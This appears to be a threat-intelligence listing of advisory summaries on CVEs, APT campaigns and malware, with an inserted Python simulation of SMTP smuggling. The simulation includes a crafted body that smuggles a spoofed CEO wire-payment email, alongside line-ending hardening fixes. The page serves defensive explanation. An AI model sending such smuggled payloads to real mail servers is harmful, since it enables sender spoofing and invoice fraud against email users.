Microsoft’s January 2024 Patch Tuesday Addresses 49 Vulnerabilities
Summary: Microsoft's January 2024 Patch Tuesday addressed 49 vulnerabilities, including two critical ones, covering various products. Notably, a high-risk Kerberos security flaw (CVE-2024-20674) and a network-adjacent Hyper-V vulnerability (CVE-2024-20700) were patched, urging prompt updates to mitiga...
Unveiling the Sea Turtle Cyber Espionage Campaign
Summary: Sea Turtle, a Turkey-based Advanced Persistent Threat (APT) actor, has been active since 2017. The group has primarily targeted European and Middle Eastern organizations, focusing on information theft and DNS hijacking to compromise repositories with valuable and sensitive data. In a recen...
Anonymous Arabic Hacktivist Group Orchestrating Silver RAT
Summary: Silver RAT, a Windows-based RAT written in C# and developed by a group known as "Anonymous Arabic," exhibits advanced capabilities, including antivirus evasion and ransomware encryption. Despite facing bans, the threat actor's dynamic activities persist, featuring the sharing of cracked...
CISA Known Exploited Vulnerability Catalog December 2023
For the detailed CISA KEV Catalog, download the PDF here. Summary: The Known Exploited Vulnerabilities (KEV) catalog, maintained by CISA, is the authoritative source of vulnerabilities that have been exploited in the wild. It is recommended that all organizations review and monitor the KEV catalog,...
Attacks, Vulnerabilities and Actors 1 January to 7 January 2024
For a detailed threat digest, download the PDF here. Summary: HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of twelve executed attacks, two instances of adversary activity, and three exploited...
Ivanti Addresses Critical Vulnerability in Endpoint Manager
Summary: Ivanti addressed a critical vulnerability (CVE-2023-39336) in its Endpoint Management software, ensuring secure usage for its 40,000 worldwide customers. The flaw, resolved in version 2022 Service Update 5, posed a risk of pre-authentication SQL injection and possibly remote code execution ...
Decoding UAC-0050’s Cyber Espionage Playbook
Summary: UAC-0050, a threat actor focused on Ukraine, is using new tactics to spread the Remcos RAT. In its latest move, UAC-0050 shows adaptability by avoiding detection through a covert data transfer method that sidesteps EDR systems. Threat Level - Amber | Attack Report Fo...
Surging JavaScript Threats Steal Your Secrets
Summary: The threat actors utilize malicious JavaScript samples, taking advantage of popular survey sites, low-quality hosting, and web chat APIs to steal sensitive information. They create chatbots registered under notable figures, like an Australian footballer, in specific campaigns...
SMTP Smuggling Enabling Spoofed Emails to Evade Authentication Protocols
Summary: A new email spoofing technique called "SMTP Smuggling" lets attackers send emails from fake addresses, bypassing security checks. This trick works by abusing how different servers handle line endings in email messages. The attack could affect millions of email users, so updating your...
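The line-ending mismatch this summary refers to can be shown end to end. The following is an added example, not code from the advisory or from any mail server: it models an outbound server that dot-stuffs only lines it recognises as CRLF-delimited, and two inbound servers, one that ends DATA strictly on `<CR><LF>.<CR><LF>` per RFC 5321 and one (assumed "lenient" for the example) that also honours `<LF>.<CR><LF>`. The message body, the domain names and the lenient marker list are constructed for the illustration.

```python
import re
from typing import List, Tuple

# RFC 5321 s4.1.1.4: the DATA phase ends with CRLF "." CRLF.
STRICT_EOD = [b"\r\n.\r\n"]
# Assumed lenient receiver: also treats a bare-LF variant as end-of-data.
# This class of non-conforming behaviour is what SMTP smuggling abuses.
LENIENT_EOD = [b"\r\n.\r\n", b"\n.\r\n"]

# Constructed attacker-supplied body (example data, not captured traffic).
# The bare "\n.\r\n" is the smuggling marker; everything after it is meant
# to be parsed by a lenient receiver as a second, spoofed SMTP transaction.
SMUGGLED_BODY = (
    b"Subject: hello\r\n\r\n"
    b"legit looking text"
    b"\n.\r\n"
    b"MAIL FROM:<ceo@victim.example>\r\n"
    b"RCPT TO:<cfo@victim.example>\r\n"
    b"DATA\r\n"
    b"Subject: urgent wire\r\n\r\nPlease pay the attached invoice.\r\n"
)


def dot_stuff(body: bytes) -> bytes:
    """RFC 5321 s4.5.2 transparency: prefix lines beginning with '.' by '.'.
    Splitting on CRLF only means a '\\n.' sequence never looks like a line start,
    so it is left unstuffed and reaches the receiver intact."""
    lines = body.split(b"\r\n")
    return b"\r\n".join(b"." + ln if ln.startswith(b".") else ln for ln in lines)


def normalize_line_endings(body: bytes) -> bytes:
    """Hardened sender step: rewrite every bare LF or bare CR to CRLF before
    dot-stuffing, so a smuggled '\\n.' becomes a stuffed '\\r\\n..' line."""
    return re.sub(rb"\r\n|\r|\n", b"\r\n", body)


def outbound_server(body: bytes, hardened: bool) -> bytes:
    """Bytes the sending server puts on the wire for the DATA phase."""
    if hardened:
        body = normalize_line_endings(body)
    return dot_stuff(body) + b"\r\n.\r\n"


def inbound_receive(wire: bytes, eod_markers: List[bytes]) -> Tuple[bytes, bytes]:
    """Return (message, remainder): the message is everything before the first
    end-of-data marker this receiver recognises; the remainder is what it will
    go on to parse as further SMTP commands in the same session."""
    hits = [(wire.find(m), m) for m in eod_markers if wire.find(m) != -1]
    if not hits:
        return wire, b""
    idx, marker = min(hits)
    return wire[:idx], wire[idx + len(marker):]


def smuggled_commands(remainder: bytes) -> List[bytes]:
    """Command lines the receiver would act on after an early end-of-data,
    up to and including the next DATA verb."""
    cmds: List[bytes] = []
    for line in remainder.split(b"\r\n"):
        if not line:
            continue
        cmds.append(line)
        if line.upper() == b"DATA":
            break
    return cmds


def simulate(body: bytes, hardened: bool, eod_markers: List[bytes]) -> Tuple[bytes, List[bytes]]:
    """Run one body through the sender and a receiver; return the message the
    receiver accepted and any commands it would execute afterwards."""
    wire = outbound_server(body, hardened)
    message, remainder = inbound_receive(wire, eod_markers)
    return message, smuggled_commands(remainder)


if __name__ == "__main__":
    for name, markers in (("strict", STRICT_EOD), ("lenient", LENIENT_EOD)):
        for hardened in (False, True):
            _, cmds = simulate(SMUGGLED_BODY, hardened, markers)
            print(f"{name:8s} receiver, hardened sender={hardened!s:5s}: smuggled={cmds}")
```

With the unhardened sender, the strict receiver keeps the whole payload inside one message body (the `MAIL FROM` lines arrive as harmless text), while the lenient receiver terminates DATA at the bare-LF marker and then executes a second `MAIL FROM`/`RCPT TO`/`DATA` over the same connection, which is why SPF passes: the TCP session still originates from the legitimate outbound server. Normalising line endings before dot-stuffing on the sending side removes the smuggled terminator; on the receiving side, the equivalent fix is to reject or normalise bare line endings (Postfix, for example, added the `smtpd_forbid_bare_newline` setting for this).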
Malware Leveraging Google OAuth for Persistent Account Access
Summary: Information-stealing malware is actively exploiting an undocumented Google OAuth endpoint called MultiLogin. This technique was initially disclosed by a threat actor named PRISMA on their Telegram channel and has subsequently been integrated into various malware-as-a-service (MaaS) stealer...
Attacks, Vulnerabilities and Actors 25 December to 31 December 2023
For a detailed threat digest, download the PDF here. Summary: HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of eight executed attacks, four instances of adversary activity, and five exploited...
Nim Backdoor Masquerades as Nepal Government Security
Summary: Attackers employed malicious Microsoft Word documents disguised as official communications from the Nepali government. These documents aimed to trick victims into downloading and executing a backdoor program written in the Nim programming language. As Nim is an uncommon language, it pose...
Unveiling Novel Malware Waves by APT28
Summary: A recent phishing campaign attributed to the Russia-linked APT28 group has been identified targeting Ukrainian government entities and Polish organizations with email messages urging recipients to click on a link to view a document. The goal is to deploy previously undocumented malware,...
Zero-Day Authentication Bypass Exploit in Apache OFBiz
Summary: CVE-2023-51467 is a critical authentication bypass vulnerability in Apache OFBiz. Exploiting it allows an attacker to bypass authentication and achieve a simple Server-Side Request Forgery (SSRF) or arbitrary code execution. Users are advised to update to Apache OFBiz version...
Kimsuky Group’s Intriguing Exploits with AppleSeed Malware
Summary: The Kimsuky group has been actively utilizing weaponized LNK files to deploy the AppleSeed malware. While the group typically relies on spear-phishing attacks for initial access, their recent campaigns have prominently featured the use of shortcut-type malware in LNK file format. AppleSe...
Terrapin Attack Downgrading the Fortresses of SSH
Summary: The Terrapin attack, a cryptographic exploit targeting the widely adopted SSH protocol, poses a threat to the security of over 15 million servers dispersed across the Internet. This vulnerability enables attackers to compromise the security of established connections by truncating the...
Barracuda Fixes ACE Zero-day Vulnerability Exploited by Attackers
Summary: The Barracuda Email Security Gateway vulnerability CVE-2023-7102 allows remote attackers to execute arbitrary commands, posing a substantial threat to the security and functionality of affected systems. Exploitation by threat actors has led to the deployment of new malware variants,...
UAC-0099 Utilizes WinRAR Exploit to Deploy LONEPAGE Malware
Summary: UAC-0099, a threat actor, has been involved in persistent attacks targeting Ukraine. These attacks leverage a critical vulnerability in WinRAR to deploy a malware strain known as LONEPAGE. Notably, the threat actor focuses on Ukrainian employees working for organizations outside of...
Cloud Atlas Exploits Six-Year-Old Flaw to Target Russian Companies
Summary: The threat actor Cloud Atlas has been identified in spear-phishing attacks targeting Russian enterprises. The modus operandi involves a phishing message in the initial stage, containing a lure document that exploits CVE-2017-11882, a memory corruption vulnerability in Microsoft Office's...
Operation RusticWeb: Coordinated Strikes on Indian Government
Summary: Since October 2023, an orchestrated phishing campaign named Operation RusticWeb has been systematically targeting the Indian government and defense sector, deploying Rust-based malware for sophisticated intelligence gathering. Threat Level - Amber | Attack Report For a detailed threat...
Attacks, Vulnerabilities and Actors 18 December to 24 December 2023
For a detailed threat digest, download the PDF here. Summary: HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of 15 executed attacks, 4 instances of adversary activity, and 7 exploited vulnerabilities,...
MetaStealer a $125 Ticket to Digital Chaos
Summary: MetaStealer, a nefarious information-stealing malware, initially surfaced in discreet online marketplaces with a pricing structure of USD 125 per month or USD 1000 for an unlimited subscription, subsequently becoming entangled in malvertising campaigns. Threat Level - Red | Attack Report...
Bandook a 2007 Legacy Still Thriving in the Threat Landscape
Summary: The Bandook malware is a persistent remote access trojan (RAT) that surfaced in 2007. Programmed in Delphi and C++, it has evolved through various iterations over the years and has historical associations with Dark Caracal. It featured prominently in a campaign dubbed ‘Operation Manul’...
Zero-Click Outlook RCE Exploitation Chain in Windows
Summary: Two vulnerabilities, CVE-2023-35384 and CVE-2023-36710, in Microsoft Windows can be chained to achieve remote code execution (RCE) on vulnerable Outlook clients. Attackers can exploit these flaws by sending a crafted email with a custom notification sound file to trigger the download of a...
Muddywater Utilizes Custom Tools to Target Telecom Companies
Summary: The Iranian espionage group Muddywater targeted telecommunications companies in Egypt, Sudan, and Tanzania in November 2023. The attackers employed a diverse set of tools for this activity, including leveraging the MuddyC2Go infrastructure. Additionally, they utilized the SimpleHelp remote...
Google’s Battle Against Zero-Day Vulnerability Continues
Summary: Google has recently implemented a security enhancement to address a high-severity zero-day vulnerability, identified as CVE-2023-7024, that can lead to program crashes or enable arbitrary code execution. Threat Level - Red | Vulnerability Report For a detailed threat advisory, download t...
Mallox Ransomware A Resurgent Threat Exploiting MS-SQL Flaws
Summary: Mallox is a resilient Ransomware-as-a-Service (RaaS) threat, utilizing tactics like exploiting MS-SQL vulnerabilities and employing brute force attacks. Operating with a prolonged presence, Mallox's recent variant, "Mallox.Resurrection," exhibits consistent functionalities, emphasizing the...
Novel Go-Based Malware Unleashes Coordinated Strikes on macOS and Windows
Summary: A recently identified threat known as JaskaGO has surfaced as a new cross-platform information stealer malware. This malware is designed to target and compromise systems running both Windows and Apple macOS operating systems. Threat Level - Red | Attack Report For a detailed threat...
PikaBot Malware Unleashes Threat via Malvertising
Summary: PikaBot, a recently identified malware family, has become a prominent threat in malvertising campaigns, particularly through search engine ads. Associated with the TA577 threat actor and linked to ransomware distribution, PikaBot employs advanced tactics, such as decoy websites and...
The Kuiper Ransomware Surge and Its Dark Origins
Summary: In a predominantly Russian Dark Web forum, a sophisticated ransomware-as-a-service (RaaS) project named "KUIPER" was introduced. The Kuiper ransomware, developed in Golang, is compatible with Windows, Linux, and macOS systems, and is associated with a suspected intrusion at a government...
OilRig Group Unleashes Three New Malware Strains
Summary: The Iranian state-sponsored threat actor, commonly referred to as OilRig, implemented three distinct downloader malware variants throughout the year 2022. The primary objective was to sustain persistent access to targeted organizations located in Israel. OilRig demonstrated active...
Play Ransomware A Global Threat Impacting Businesses
Summary: The Play ransomware group, active since June 2022, employs a double-extortion model, impacting businesses globally. Utilizing legitimate tools for malicious activities, the group has affected approximately 300 entities. Threat Level - Red | Attack Report For a detailed threat advisory,...
Attacks, Vulnerabilities and Actors 11 December to 17 December 2023
For a detailed threat digest, download the PDF here. Summary: HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of eleven executed attacks, six instances of adversary activity, and five exploited...
Gaza Cybergang’s Pierogi++ Upgrade Takes Center Stage
Summary: The Gaza Cybergang, a sophisticated threat actor, has recently intensified its attacks by deploying an advanced version of the Pierogi backdoor malware. This group focuses its cyber operations primarily on Palestinian entities and Israel, with a historical record of targeting entities...
NKAbuse: A New Multiplatform Threat Exploiting the Blockchain Protocol
Summary: A novel malware called NKAbuse stands out as a new, Go-based, multi-platform threat. What makes this malware distinctive is its pioneering use of the peer-to-peer network connectivity protocol NKN (New Kind of Network) for data exchange. This utilization of NKN technology makes...
Rhadamanthys Stealer Version 0.5.0 Upgrade Overview
Summary: Rhadamanthys, the information-stealing malware, has taken a significant leap with its v0.5.0 upgrade, introducing expanded stealing features, raw syscalls, and an enhanced loader design, showcasing advanced evasion techniques. Its modular architecture allows for continuous updates,...
Unveiling GambleForce: A SQL Injection Gang
Summary: A recently identified threat actor, GambleForce, has been linked to a series of SQL injection attacks targeting companies primarily in the Asia-Pacific region. GambleForce employs a combination of basic yet highly effective techniques, including SQL injections and exploiting...
Russian SVR Exploits Critical TeamCity Vulnerability Globally
Summary: A critical vulnerability, CVE-2023-42793, in JetBrains TeamCity is actively exploited by Russia's SVR cyber actors (APT29), allowing full server compromise. The targeted software, widely used by developers, poses a significant threat, enabling access to sensitive information and potential...
TA4557 Targets Recruiters by Delivering Malware Disguised as Job Applicant
Summary: Threat actor TA4557 has been focusing on recruiters by posing as job applicants to distribute malware. While this approach is not unprecedented, there have been notable shifts in both technique and attack vectors compared to their previous methods. The attackers have demonstrated an...
Critical Remote Code Execution Flaw Uncovered in Apache Struts 2
Summary: A significant vulnerability has been identified in the Apache Struts 2 open-source web application framework, tracked as CVE-2023-50164. This flaw poses a severe risk of remote code execution and unauthorized path traversal. Threat Level - Red | Vulnerability Report For a detailed threat...
Microsoft’s December 2023 Patch Tuesday Addresses One Zero-day Vulnerability
Summary: In the December Patch Tuesday release, Microsoft addressed a total of 42 CVEs, including one zero-day vulnerability. Within this range of vulnerabilities, the security update covered the typical spectrum of issues, including RCE flaws, concerns related to privilege escalation, spoofing,...
Apple’s Timely Response to Actively Exploited Zero-Days
Summary: Apple has released crucial software updates to address two actively exploited security vulnerabilities identified as CVE-2023-42916 and CVE-2023-42917. These vulnerabilities affect the WebKit browser engine on Apple devices such as iPhone, iPad, and Mac, potentially exposing sensitive...
Adversaries Leverage Social Media to Disseminate New Python-Based Stealer
Summary: A recently identified malicious campaign involves the use of WinRAR archive files with minimal detection to execute a multi-stage attack. The payload, known as Editbot, is a newly discovered Python-based stealer. Editbot is specifically designed to extract process information and data...
The Unseen Thread Linking Sandman APT and KEYPLUG Backdoor
Summary: The Sandman Advanced Persistent Threat (APT) is closely linked to suspected threat clusters originating from China, specifically identified as Storm-0866, also known as Red Dev 40. Within the same victim environments, Sandman's Lua-based malware, LuaDream, and the KEYPLUG backdoor have...
Lazarus’s Operation Blacksmith Deploys Novel Dlang RATs
Summary: The Lazarus Group, a North Korea-linked threat actor, has been identified in a new global campaign called "Operation Blacksmith." In this campaign, the group opportunistically exploits the security vulnerability CVE-2021-44228 in Log4j to deploy previously undocumented RATs on compromise...
Attacks, Vulnerabilities and Actors 4 December to 10 December 2023
For a detailed threat digest, download the PDF here. Summary: HiveForce Labs recently made several significant discoveries in the realm of cybersecurity threats. In the past week alone, a total of eleven attacks were executed, eleven vulnerabilities were uncovered, and four active adversaries...
Decoding MrAnon Stealer’s Plot through Deceptive Emails
Summary: A phishing email campaign employs misleading booking details to lure victims, aiming to deploy a Python-based information stealer known as MrAnon Stealer. This malicious software is designed to pilfer victims' credentials, system details, browser sessions, and cryptocurrency extensions...
APT28’s Tactical Exploitation of Critical Vulnerabilities
Summary: The APT28 adversary, originating from Russia, has garnered notoriety through sophisticated phishing activities. By exploiting patched vulnerabilities as an initial access point, APT28 conducts extensive campaigns targeting diverse sectors, including government, aerospace, education,...
New Linux Krasue RAT Targeting Telecom Companies in Thailand
Summary: Krasue, a new Linux Remote Access Trojan, targets Thai organizations, primarily in telecommunications, using embedded rootkits and a unique RTSP-based communication tactic. Believed to be connected to XorDdos, it evades detection through various stealth measures, emphasizing the importan...
Star Blizzard Continues to Refine Their Tradecraft for Evasion and Stealth
Summary: The Russia-based threat actor, Star Blizzard, continues to utilize spear-phishing attacks successfully, targeting organizations and individuals across various geographical regions for information-gathering activities. Star Blizzard has improved its detection evasion capabilities since 20...